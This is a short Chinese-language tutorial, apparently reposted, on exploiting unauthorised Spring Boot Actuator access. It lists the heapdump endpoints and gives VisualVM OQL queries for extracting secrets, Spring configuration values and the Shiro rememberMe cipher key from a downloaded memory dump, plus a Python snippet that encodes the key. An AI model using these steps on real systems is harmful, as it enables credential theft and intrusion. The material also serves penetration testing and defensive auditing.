Actuator 未授權訪問之heapdump利用


actuator 下載heapdump 文件

若目標網站存在actuator未授權訪問漏洞,一般訪問如下鏈接可下載內存文件

/heapdump
/actuator/heapdump

 

工具

利用 visualvm 打開下載的heapdump文件
https://visualvm.github.io/download.html

根據 env 中的字符串查找secret

打開visualvm右邊選擇OQL Console, 下方輸入如下,點擊查詢

select s from java.lang.String s 
    where /wx081111111/.test(s.value.toString())

根據查詢結果可以獲取到secret

查找spring config中的配置

右上角點擊Objects 下方輸入框輸入,點擊查詢,也可以獲取到前台打碼的信息

org.springframework.core.env.MapPropertySource

查找Shiro CipherKey

過濾條件輸入
org.apache.shiro.web.mgt.CookieRememberMeManager


可通過下面python代碼將byte 轉換成base64編碼的key

base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -108,-108,-108,-108,52,-80,-42,-32,34,-68,3,-109,111,-43,-81,-25))


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM